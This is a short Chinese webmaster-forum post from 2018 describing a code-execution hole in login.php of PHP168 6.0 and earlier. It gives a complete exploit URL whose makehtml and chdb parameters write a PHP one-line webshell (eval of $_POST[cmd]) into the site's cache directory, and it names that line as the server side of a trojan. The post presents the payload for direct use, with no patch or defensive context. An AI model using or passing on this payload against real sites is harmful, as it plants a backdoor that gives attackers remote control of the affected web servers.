推56论坛

 找回密码
 立即注册(限中文)

QQ登录

只需一步,快速开始

    查看: 2712|回复: 0

    [php168教程] PHP168 6.0及以下版本login.php代码执行

      [复制链接]
    发表于 2018-8-30 14:46:35 | 显示全部楼层 |阅读模式
    在其域名后加上这样一段代码:
    login.php?makehtml=1&chdb[htmlname]=xx.php& chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>。
    这段代码 的意思利用login.php文件将
    <?php%20@eval($_POST[cmd]);?>
    这段代码写入到网站缓存目录 cache的xx.php文件中。“<?php%20@eval($_POST[cmd]);?>”就是一句话木马的服务端。


    URL是
    http://www.xx.com/login.php?makehtml=1&chdb[htmlname]=xx.php&chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>

    本版积分规则

    关闭

    推56站长论坛推荐上一条 /1 下一条

    站长QQ
    在线咨询
    咨询热线
    QQ:405327411

    QQ|免责声明|小黑屋|站长论坛 ( 豫ICP备11018337号-5 )

    推56论坛(www.tui56.com)站长论坛 SEO论坛 网络营销论坛 新手站长论坛 网络推广论坛 站长社区 站长网

    Powered by Discuz! X3.4 Licensed

    ©2001-2013 Comsenz Inc.

    快速回复 返回顶部 返回列表